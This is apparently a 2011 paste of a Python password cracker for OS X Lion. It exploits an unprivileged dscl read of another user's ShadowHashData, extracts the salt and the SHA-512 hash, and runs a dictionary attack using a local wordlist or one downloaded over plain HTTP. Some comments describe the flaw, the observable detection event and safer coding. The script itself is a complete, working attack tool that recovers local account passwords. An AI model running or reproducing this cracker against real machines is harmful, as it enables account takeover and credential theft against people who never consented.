defenceindepth

OS X Lion Password Cracker

Sep 18th, 2011
  1. ##########################################
  2. #* OS X Lion 10.7 Password Cracker
  3. #* UID 0 NOT required
  4. #*
  5. #* Usage:
  6. #* python lion_crack.py [username] [dictionary]
  7. #*
  8. #*
  9. #* Patrick Dunstan
  10. #* Sep 18, 2011
  11. #* http://www.defenceindepth.net
  12. #*
  13. ###########################################
  14. from subprocess import *
  15. import hashlib
  16. import os
  17. import urllib2
  18. import sys
  19. from string import *
  20.  
  # Target account state. The script body fills these in from argv or from the
  # output of `whoami`.
  username = ""
  defaultuser = False

  # Wordlist fetched when no dictionary file is passed on the command line.
  # The scheme is plain http://, so the download has no transport integrity:
  # whatever answers for this host decides the list contents.
  link = "http://nmap.org/svn/nselib/data/passwords.lst"
  24.  
  def check(password):
      """Hash one candidate and compare it with the digest read from dscl.

      Reads the module-level names ``salt_hex``, ``hash`` and ``username``,
      which the script body assigns before the first call. Candidates that
      start with "#!" are skipped. On a match the cleartext is printed and
      the process exits with status 0; otherwise the function returns None.
      """
      # Wordlist comment lines are prefixed with "#!"; never hash them.
      if password.startswith("#!"):
          return

      # One SHA-512 pass over (4-byte salt + candidate), no key stretching.
      # A guess therefore costs a single hash, which is why the stored value
      # must stay unreadable to unprivileged users.
      candidate_digest = hashlib.sha512(salt_hex + password).hexdigest()
      print("Trying... " + password)

      if candidate_digest != hash:
          return

      print("Cleartext password for user '"+username+"' is : "+password)
      exit(0)
  35.  
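  # ---------------------------------------------------------------------------
  # Script body. Order matters: check() reads the module-level names
  # `username`, `hash` and `salt_hex`, so all three are assigned here before
  # the first check() call.
  #
  # Defensive context: the header states that UID 0 is not required, i.e. the
  # script depends on Directory Services returning ShadowHashData to an
  # unprivileged caller. Where that read is denied, no digest is found and the
  # script stops at the explicit check below. A non-admin process running
  # `dscl localhost -read /Search/Users/<name>` is the observable event.
  # ---------------------------------------------------------------------------

  # 1. Pick the account: argv[1] if given, otherwise the invoking user.
  if len(sys.argv) < 2:
      print("No username given. Defaulting to current user.")
      defaultuser = True
  else:
      username = sys.argv[1]

  # Fixed command; an argument vector avoids spawning a shell at all.
  p = Popen(["whoami"], stdout=PIPE)
  whoami = p.communicate()[0]

  if defaultuser:
      username = whoami.rstrip()

  # 2. Read the user record. `username` can come straight from argv, so it is
  # passed as one element of an argument vector instead of being concatenated
  # into a shell=True command line, where shell metacharacters in the name
  # would be interpreted.
  p = Popen(["dscl", "localhost", "-read", "/Search/Users/" + username],
            stdout=PIPE)
  dscl_out = p.communicate()[0]

  dscl_lines = dscl_out.split("\n")  # renamed from `list` (shadowed the builtin)

  # The hex dump sits on the line after the attribute name. The last match
  # wins, as in the original loop, which had no break.
  digest = None
  for pos, item in enumerate(dscl_lines):
      if "dsAttrTypeNative:ShadowHashData" in item and pos + 1 < len(dscl_lines):
          digest = dscl_lines[pos + 1].replace(" ", "")

  if digest is None:
      # Previously this fell through to a NameError on `digest`.
      print("No ShadowHashData returned for user '" + username + "'.")
      sys.exit(1)

  # 3. Slice salt (8 hex chars) and hash (128 hex chars) out of the dump. The
  # layout is keyed on the total length of the dump; the offsets are the
  # author's and are kept unchanged.
  if len(digest) == 262:  # Out of box configuration
      salt = digest[56:64]
      hash = digest[64:192]
  elif len(digest) == 314:  # SMB turned on
      print("SMB is on")
      salt = digest[104:112]
      hash = digest[112:240]
  elif len(digest) == 1436:  # Lion Server
      salt = digest[176:184]
      hash = digest[176:304]
  elif len(digest) == 1492:  # Lion Server with SMB
      salt = digest[224:232]
      hash = digest[232:360]
  else:
      # Previously an unknown layout surfaced as a NameError on `salt`.
      print("Unrecognised ShadowHashData length: " + str(len(digest)))
      sys.exit(1)

  print("SALT : " + salt)
  print("HASH : " + hash)

  # Four hex pairs become the four raw salt bytes that are prepended to each
  # candidate in check().
  salt_hex = "".join(chr(int(salt[i:i + 2], 16)) for i in range(0, 8, 2))

  # 4. Feed candidates to check(); it exits the process on the first match.
  if len(sys.argv) == 3:  # If dictionary file specified
      print("Reading from dictionary file '"+sys.argv[2]+"'.")
      check(whoami.rstrip())
      # `with` closes the file even when check() exits via SystemExit.
      with open(sys.argv[2], "r") as passlist:
          for line in passlist:
              check(line.rstrip())

  else:  # No dictionary file specified
      print("No dictionary file specified. Defaulting to hard coded link.")

      # NOTE(review): `link` is plain http://, so the list is fetched without
      # integrity protection; treat the downloaded content as untrusted input.
      passlist = urllib2.urlopen(link)  # Download dictionary file
      try:
          passwords = passlist.read().split("\n")
      finally:
          passlist.close()  # the response was never closed before
      print("\nPassword list successfully read")

      passwords.append(whoami.rstrip())

      print("\nCracking...")
      for password in passwords:
          check(password)

  # 5. Only reached when no candidate matched. The file holds salt + password
  # hash, which is credential material, so it is created owner-only (0600)
  # instead of inheriting the umask default. fchmod also tightens a file that
  # already existed with looser permissions.
  print("\nSaving hash to "+username+".hash...")
  fd = os.open(username + ".hash", os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
  out = os.fdopen(fd, "w")
  try:
      os.fchmod(fd, 0o600)
      out.write(salt + hash)
  finally:
      out.close()

  print("\nPassword not found. Try another dictionary.\n")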